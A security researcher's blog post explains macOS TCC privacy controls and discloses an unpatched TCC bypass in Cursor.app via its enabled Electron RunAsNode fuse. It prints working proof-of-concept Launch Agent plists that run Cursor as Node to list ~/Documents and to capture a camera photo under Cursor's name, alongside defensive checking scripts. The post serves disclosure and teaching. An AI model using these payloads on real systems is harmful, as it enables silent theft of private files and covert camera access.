Lately, I have been reporting many vulnerabilities in third-party applications that allowed for TCC bypass, and I have discovered that most vendors do not understand why they should care. For them, it seems like just an annoying and unnecessary prompt. Even security professionals tasked with vulnerability triage frequently struggle to understand TCC’s role in protecting macOS users’ privacy against malware.

Honestly, I don’t blame them, because two years ago I didn’t understand the purpose of those “irritating” pop-up notifications either. It wasn’t until I started writing malware for macOS that I realized how much trouble TCC causes an attacker who actually wants to harm a victim. I wrote this article with application developers in mind so that, after reading it, they do not underestimate vulnerabilities that allow bypassing TCC. It is also intended for vulnerability researchers, to illustrate an attack vector for further research.

Enjoy!

TCC Bypass, aka annoying prompt





I call TCC (Transparency, Consent, and Control) the front door of platform privacy, as it controls every app’s access to the user’s private assets. Before an app can access TCC-protected assets on macOS, the user must first permit it (via the TCC pop-up or manually in the Privacy settings). I bet every macOS user has seen this prompt at least once.

I will not dive deep into the TCC components here. I described them thoroughly in Snake & Apple IX – TCC, and that level of detail is not needed to follow the rest of this article.

TCC Protected Privacy Assets

The TCC framework manages access to a wide array of sensitive resources, including:

- Files in protected locations such as the Desktop, Documents, and Downloads folders

- Personal data, including contacts, calendars, and reminders

- Hardware devices such as cameras and microphones

- Access to other apps in the /Applications directory

- Data managed by other applications

- Screen recording capabilities

- Location services data

- Health data



Which app can access which asset can be seen in the Privacy & Security pane of System Settings.

That sums up the TCC protection. Without this access, apps (or malware) cannot get these assets, period.

App Sandbox and TCC Bypass Impact

Before TCC even comes into play, there is the App Sandbox. If your app runs with com.apple.security.app-sandbox = true and uses no additional entitlements, the impact of a TCC bypass is smaller, but not zero. If your app does use entitlements like the ones below, the risk increases significantly:

```
com.apple.security.device.camera
com.apple.security.device.microphone
com.apple.security.personal-information.location
com.apple.security.personal-information.calendars
com.apple.security.personal-information.photos-library
com.apple.security.device.usb
com.apple.security.print
com.apple.security.device.bluetooth
com.apple.security.personal-information.addressbook
com.apple.security.files.user-selected.read-only
com.apple.security.files.user-selected.read-write
com.apple.security.files.downloads.read-only
com.apple.security.files.downloads.read-write
com.apple.security.assets.pictures.read-only
com.apple.security.assets.pictures.read-write
com.apple.security.assets.music.read-only
com.apple.security.assets.music.read-write
com.apple.security.assets.movies.read-only
com.apple.security.assets.movies.read-write
# and more...
```

If malware injects code into a sandboxed app that is not entitled to access the resources the malware wants, the TCC layer is not even reached, and the TCC prompt will not appear.
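To make the sandbox point a bit more tangible, here is a minimal Python sketch that summarizes what an injected payload could try to inherit from an app. It assumes the entitlements were already exported as a plist (for example with `codesign -d --entitlements`; the exact flags differ between macOS versions). The names `summarize_entitlements` and `PRIVACY_PREFIXES` are mine, and the prefixes only cover part of the list above, so treat it as an illustration rather than a complete audit.

```python
import plistlib

# Prefixes of the privacy-relevant entitlements listed above (an assumption of
# this sketch; e.g. com.apple.security.print is deliberately not covered).
PRIVACY_PREFIXES = (
    "com.apple.security.device.",
    "com.apple.security.personal-information.",
    "com.apple.security.files.",
    "com.apple.security.assets.",
)


def summarize_entitlements(plist_bytes: bytes) -> dict:
    """Return the sandbox flag and the privacy-relevant entitlements set to true."""
    entitlements = plistlib.loads(plist_bytes)
    granted = sorted(
        key
        for key, value in entitlements.items()
        if value is True and key.startswith(PRIVACY_PREFIXES)
    )
    return {
        "sandboxed": entitlements.get("com.apple.security.app-sandbox") is True,
        "privacy_entitlements": granted,
    }


if __name__ == "__main__":
    # Hypothetical entitlements of a sandboxed app that may use the camera.
    sample = plistlib.dumps(
        {
            "com.apple.security.app-sandbox": True,
            "com.apple.security.device.camera": True,
            "com.apple.security.network.client": True,
        }
    )
    print(summarize_entitlements(sample))
```

A sandboxed app with an empty `privacy_entitlements` list gives injected code very little to inherit, which is the low-impact case described above.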

Unsandboxed Apps

For most resources, the prompt will also not appear when malware injects into an unsandboxed app that lacks the corresponding entitlement. However, malware can still reach many TCC-protected assets this way, such as:

- iCloud Drive

- Network volumes

- Desktop (~/Desktop)

- Documents (~/Documents)

- Downloads (~/Downloads)

- iTunes library (~/Music, ~/Pictures, ~/Movies)

- Files managed by other apps (like iCloud, Dropbox)

- Data from other apps in ~/Library/Application Support and ~/Library/Containers

The impact of injection into unsandboxed apps is smaller if they do not have entitlements, as malware can silently inherit only the above assets. Still, it should be treated seriously.

TCC Bypass in the macOS Threat Model



Okay, we know how the TCC protection works, but where does it sit in the attack chain? For reference, I will use the MITRE ATT&CK matrix to show the bigger picture before walking through an example from the malware’s perspective:

On Windows or Linux, once the system is infected, malware can access whatever it wants in the context of the user session. Local Privilege Escalation there means obtaining NT AUTHORITY\SYSTEM or root privileges. On macOS, things are much more complicated because of the TCC layer, which mitigates the impact.

Apple’s introduction of TCC adds another step in local privilege escalation on macOS, even if the malware has already gained root access.

Malware Shoes

To understand the problem, let’s put ourselves in the malware’s shoes and walk through macOS after gaining initial access. The scenario is that the malware is already there, no matter how, but for the context, let’s say the user installed a malicious application.

If you are interested in researching the various ways of gaining initial access, check the MITRE ATT&CK Initial Access tactic (TA0001).

Proof of Concept



I will imitate the malware (unsandboxed application) that is running in the context of the user session by just running commands in the terminal with all TCC permissions removed:

❯ tccutil reset All com.apple.Terminal && csrutil status && whoami && sw_vers

Successfully reset All approval status for com.apple.Terminal

System Integrity Protection status: enabled.

karmaz

ProductName: macOS

ProductVersion: 15.4.1

BuildVersion: 24E263Malware, even when directly executed by the user, cannot access the user’s Documents directory as TCC protects it:

❯ ls /Users/karmaz/Documents

ls: /Users/karmaz/Documents: Operation not permitted (os error 1).Even if the malware gains root permissions, this is still blocked by the TCC:

❯ sudo ls /Users/karmaz/Documents



ls: /Users/karmaz/Documents: Operation not permittedThe only way to list files in the TCC-protected directories on a default macOS installation is through the Finder (using the GUI), as shown below:

However, malware does not have GUI access, and even then, this still does not grant access to read or modify the content of these files. For the above, malware would need to gain Automation privileges over Finder:

These are pretty difficult to obtain. No application has been granted such privileges in a standard macOS installation, and I have never seen a third-party application that has them. Even then, malware needs to somehow inject itself into such an application, for which a vulnerability in the app is needed.

To reiterate: on a default installation of macOS, unless the adversary has a 0-day, there is no programmatic way to bypass TCC restrictions! Malware cannot access TCC-protected assets even if it runs unsandboxed.
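The `ls` attempts above can also be reproduced from code. The following is a minimal Python sketch under the assumption that a TCC denial surfaces to the process as an ordinary "Operation not permitted" error, as it does for `ls`; `probe_directory` is a hypothetical helper name of mine.

```python
import os


def probe_directory(path: str) -> str:
    """Try to list `path` and report how the attempt ended."""
    try:
        entries = os.listdir(path)
    except PermissionError:
        # Python raises PermissionError for both EPERM and EACCES; the
        # "Operation not permitted" seen with ls corresponds to EPERM.
        return "denied"
    except FileNotFoundError:
        return "missing"
    return f"listed {len(entries)} entries"


if __name__ == "__main__":
    home = os.path.expanduser("~")
    for folder in ("Desktop", "Documents", "Downloads"):
        target = os.path.join(home, folder)
        print(target, "->", probe_directory(target))
```

Run from a process without any TCC grants, I would expect the protected folders to come back as "denied" or to trigger a prompt for the responsible app, depending on the context it is launched from.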

Vulnerabilities that allow TCC bypasses

So, from the adversary’s perspective, the question is: how can my malware access these TCC-protected assets? The answer is an app that holds TCC permissions and has a vulnerability that allows a TCC bypass. Basically, every vulnerability that allows code injection into the app poses a threat, such as:

- Lack of Hardened Runtime

- Disabled Library Validation (com.apple.security.cs.disable-library-validation)

- Allowance for obtaining task port rights (com.apple.security.get-task-allow)

- Misconfigured Node Fuse in Electron apps (see Wojciech Reguła’s post about it)

- …
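Two of the items in this list are plain entitlements, so they are easy to check for. Below is a minimal Python sketch that flags them in an exported entitlements plist. It does not cover the Hardened Runtime flag or Electron fuses, which are not entitlements, and the names `INJECTION_ENTITLEMENTS` and `find_injection_risks` are my own.

```python
import plistlib

# The two entitlements named in the list above, with a short reason each.
INJECTION_ENTITLEMENTS = {
    "com.apple.security.cs.disable-library-validation": "library validation is disabled",
    "com.apple.security.get-task-allow": "task port rights can be obtained",
}


def find_injection_risks(plist_bytes: bytes) -> list[str]:
    """Return a finding for every injection-related entitlement set to true."""
    entitlements = plistlib.loads(plist_bytes)
    return [
        f"{key}: {reason}"
        for key, reason in INJECTION_ENTITLEMENTS.items()
        if entitlements.get(key) is True
    ]


if __name__ == "__main__":
    # Hypothetical entitlements of an app shipped with a debug entitlement.
    sample = plistlib.dumps({"com.apple.security.get-task-allow": True})
    for finding in find_injection_risks(sample):
        print(finding)
```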

We’ve documented several TCC bypass vulnerabilities in popular applications if you’re interested in learning more:

- TCC Bypass via get-task-allow entitlement – Code injection through misconfigured entitlements in notarized apps (CVE-2025-8597, CVE-2025-8700)

- TCC Bypass in Visual Studio Code – Microsoft’s refusal to patch Electron fuse misconfiguration

- Unvalidated XPC Clients on macOS – TCC bypass through Sparkle framework vulnerabilities (CVE-2025-10015)

- Zero Day Vulnerability Microsoft Delivered to macOS – .NET MAUI framework TCC bypass vulnerability

The point is: if you are an application developer or security architect and receive a report that clearly demonstrates a TCC bypass, no matter how it works or which vulnerability it relies on, please treat it seriously.



Cooking Cursor.app

I decided to disclose a TCC bypass vulnerability in Cursor.app because, despite responsible disclosure, the developers stated that this issue “falls outside their threat model” and that they have no plans to fix it. Given the app’s growing popularity in AI-powered development, users deserve to know about this security risk so they can make informed decisions and implement mitigations. The problem is that the application enables the RunAsNode fuse. When it is enabled, the app can be executed as a generic Node.js process. This lets malware inject malicious code that inherits the application’s TCC permissions:

```shell
❯ npx @electron/fuses read --app "/Applications/Cursor.app/Contents/MacOS/Cursor"
Analyzing app: Cursor
Fuse Version: v1
RunAsNode is Enabled
EnableCookieEncryption is Disabled
EnableNodeOptionsEnvironmentVariable is Enabled
EnableNodeCliInspectArguments is Enabled
EnableEmbeddedAsarIntegrityValidation is Disabled
OnlyLoadAppFromAsar is Disabled
LoadBrowserProcessSpecificV8Snapshot is Disabled
GrantFileProtocolExtraPrivileges is Enabled

❯ sha256sum /Applications/Cursor.app/Contents/MacOS/Cursor
d7e921031559eae1bb5a12f519c940786edc10709e5b53e8b89fa51c987d1ffb /Applications/Cursor.app/Contents/MacOS/Cursor
```

Now, there are two possible scenarios of exploitation that may occur.
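If you want to triage several Electron apps, the fuse listing can be parsed mechanically. This is a minimal Python sketch that works on the text output shown above. RunAsNode is the fuse this article is about; treating EnableNodeOptionsEnvironmentVariable and EnableNodeCliInspectArguments as risky too is my assumption, and `parse_fuses` and `risky_fuses` are hypothetical helper names.

```python
# Fuses that, when enabled, let the app binary run caller-supplied JavaScript.
# Only RunAsNode is demonstrated in this article; the other two are assumed.
RISKY_WHEN_ENABLED = {
    "RunAsNode",
    "EnableNodeOptionsEnvironmentVariable",
    "EnableNodeCliInspectArguments",
}

SAMPLE_OUTPUT = """\
Analyzing app: Cursor
Fuse Version: v1
RunAsNode is Enabled
EnableCookieEncryption is Disabled
EnableNodeOptionsEnvironmentVariable is Enabled
EnableNodeCliInspectArguments is Enabled
EnableEmbeddedAsarIntegrityValidation is Disabled
OnlyLoadAppFromAsar is Disabled
LoadBrowserProcessSpecificV8Snapshot is Disabled
GrantFileProtocolExtraPrivileges is Enabled
"""


def parse_fuses(output: str) -> dict[str, bool]:
    """Map each '<Fuse> is Enabled|Disabled' line to a boolean."""
    fuses = {}
    for line in output.splitlines():
        name, separator, state = line.strip().partition(" is ")
        if separator and state in ("Enabled", "Disabled"):
            fuses[name] = state == "Enabled"
    return fuses


def risky_fuses(output: str) -> list[str]:
    """Return the enabled fuses that appear in RISKY_WHEN_ENABLED, sorted."""
    fuses = parse_fuses(output)
    return sorted(name for name in RISKY_WHEN_ENABLED if fuses.get(name))


if __name__ == "__main__":
    for name in risky_fuses(SAMPLE_OUTPUT):
        print("risky fuse enabled:", name)
```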

TCC Bypass Vanilla Scenario

This scenario does not require user interaction when malware exploits the vulnerability, and may occur when the victim uses the app to open a new project in the home directory, as shown below:

Immediately after that, the victim user is asked for permission:

After that, malware can use the Cursor.app as a proxy to access Documents silently, for instance by planting the Launch Agent configuration in ~/Library/LaunchAgents/:

<?xml version="1.0" encoding="UTF-8"?>

<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">

<plist version="1.0">

<dict>

<key>EnvironmentVariables</key>

<dict>

<key>ELECTRON_RUN_AS_NODE</key>

<string>true</string>

</dict>

<key>Label</key>

<string>com.crimson.electron</string>

<key>ProgramArguments</key>

<array>

<string>/Applications/Cursor.app/Contents/MacOS/Cursor</string>

<string>-e</string>

<string>

require('child_process').execSync('ls -la $HOME/Documents > /tmp/Documents.txt 2>&1');

</string>

</array>

<key>RunAtLoad</key>

<true/>

</dict>



</plist>Then, use the launchctl utility to load and execute the launch agent configuration.

launchctl load ~/Library/LaunchAgents/com.crimson.electron.plistThis causes the program to inherit TCC permissions from the vulnerable app as a child process, successfully accessing the ~/Documents folder:

Again, the terminal only imitates the malware here; it can be any app or process. The Launch Agent is also just one example of exploitation, and there are other ways that do not require access to ~/Library/LaunchAgents/.
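From the defender’s side, this particular Launch Agent trick leaves a recognizable trace. The following minimal Python sketch looks for job definitions that set ELECTRON_RUN_AS_NODE. It only covers the Launch Agent variant described above, and `sets_run_as_node` is a hypothetical helper name of mine.

```python
import plistlib
from pathlib import Path


def sets_run_as_node(plist_bytes: bytes) -> bool:
    """True if a launchd job definition sets ELECTRON_RUN_AS_NODE."""
    job = plistlib.loads(plist_bytes)
    env = job.get("EnvironmentVariables") if isinstance(job, dict) else None
    return isinstance(env, dict) and bool(env.get("ELECTRON_RUN_AS_NODE"))


if __name__ == "__main__":
    agents_dir = Path.home() / "Library" / "LaunchAgents"
    if agents_dir.is_dir():
        for plist_path in sorted(agents_dir.glob("*.plist")):
            try:
                flagged = sets_run_as_node(plist_path.read_bytes())
            except Exception:
                # Unreadable or malformed plist; skip it in this sketch.
                continue
            if flagged:
                print("suspicious launch agent:", plist_path)
```

A hit is not proof of compromise, but a launch agent that starts an Electron app in Node mode deserves a closer look.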

TCC Bypass Spoofing Scenario



This scenario requires user interaction when malware exploits the vulnerability. It happens when the app has not yet asked the user for access via the TCC prompt. For example, malware wants to escalate privileges to access the camera. As we can see, Cursor.app does have the camera entitlement:



However, it is unlikely that the user used the camera during a programming session, so they have probably not seen the TCC prompt yet. Normally, malware could not even ask for these permissions. Thanks to the vulnerability, it can not only do that but also disguise itself under the vulnerable app’s name:

```xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
    <key>EnvironmentVariables</key>
    <dict>
        <key>ELECTRON_RUN_AS_NODE</key>
        <string>true</string>
    </dict>
    <key>Label</key>
    <string>com.crimson.electron</string>
    <key>ProgramArguments</key>
    <array>
        <string>/Applications/Cursor.app/Contents/MacOS/Cursor</string>
        <string>-e</string>
        <string>require('child_process').execSync('/opt/homebrew/bin/imagesnap /tmp/photo.jpg');</string>
    </array>
    <key>RunAtLoad</key>
    <true/>
</dict>
</plist>
```

Here comes the TCC prompt from the malware app disguised as the vulnerable Cursor.app:

The second scenario requires the user to click Allow when the malware exploits the vulnerability, but let’s be honest, who among you has recently clicked Don’t Allow on this prompt? 😉

Severity of TCC Bypass

It varies depending on the scenario and the number of entitlements the vulnerable app has, but let’s be honest: this is not a critical or even high-risk issue. I classify it as medium at most, and that applies to apps that hold TCC-related entitlements or that are unsandboxed, where the malware can “ask” for many things.

CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N

CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N
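For readers who want to see where “medium” comes from, here is a minimal Python sketch of the CVSS 3.1 base score calculation applied to the first vector above. The weights and the rounding rule follow my reading of the public CVSS 3.1 specification. It handles base metrics only and does not cover CVSS 4.0, which is scored differently.

```python
import math

# Metric weights from the CVSS 3.1 specification (base metrics only).
WEIGHTS = {
    "AV": {"N": 0.85, "A": 0.62, "L": 0.55, "P": 0.2},
    "AC": {"L": 0.77, "H": 0.44},
    "UI": {"N": 0.85, "R": 0.62},
    "CIA": {"H": 0.56, "L": 0.22, "N": 0.0},
}
# Privileges Required depends on whether the scope is (U)nchanged or (C)hanged.
PR_WEIGHTS = {
    "U": {"N": 0.85, "L": 0.62, "H": 0.27},
    "C": {"N": 0.85, "L": 0.68, "H": 0.5},
}


def roundup(value: float) -> float:
    """Round up to one decimal place, as defined in the CVSS 3.1 specification."""
    scaled = round(value * 100000)
    if scaled % 10000 == 0:
        return scaled / 100000.0
    return (math.floor(scaled / 10000) + 1) / 10.0


def base_score(vector: str) -> float:
    """Compute the base score of a 'CVSS:3.1/...' vector string."""
    metrics = dict(item.split(":") for item in vector.split("/")[1:])
    scope = metrics["S"]
    cia = WEIGHTS["CIA"]
    iss = 1 - (1 - cia[metrics["C"]]) * (1 - cia[metrics["I"]]) * (1 - cia[metrics["A"]])
    if scope == "U":
        impact = 6.42 * iss
    else:
        impact = 7.52 * (iss - 0.029) - 3.25 * (iss - 0.02) ** 15
    exploitability = (
        8.22
        * WEIGHTS["AV"][metrics["AV"]]
        * WEIGHTS["AC"][metrics["AC"]]
        * PR_WEIGHTS[scope][metrics["PR"]]
        * WEIGHTS["UI"][metrics["UI"]]
    )
    if impact <= 0:
        return 0.0
    total = impact + exploitability
    if scope == "C":
        total *= 1.08
    return roundup(min(total, 10))


if __name__ == "__main__":
    print(base_score("CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N"))  # 4.4
```

A base score of 4.4 sits in the 4.0 to 6.9 band that CVSS 3.1 labels Medium.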

This does not mean it should be downplayed. Most users choose macOS because Apple protects their privacy, and they avoid products that reduce security.



Final Words

Speaking of downplaying vulnerabilities, I reported the same issue earlier to Microsoft, as Visual Studio Code is also vulnerable. They also do not care, as it “requires local access.” I have never seen Local Privilege Escalation vulnerabilities that do not require local access. I also remember the times when such things were taken quite seriously. Microsoft has once again set a great example of how NOT to act.

Honestly, I see that we are going back in time. After building all these strong operating system mitigations over the last twenty years, we are starting to downplay the bugs that allow them to be bypassed. More and more software vendors are starting to lean on some piece of paper from Google that downplays local attacks, just to avoid patching vulnerabilities while still looking “flawless.”

Let’s not go down that road.

References

- Snake & Apple IX – TCC

- ELECTRONizing macOS privacy

- [CB23] Bypassing macOS Security and Privacy Mechanisms

- CVE-2023-26818: MacOS TCC Bypass with telegram using DyLib Injection Part1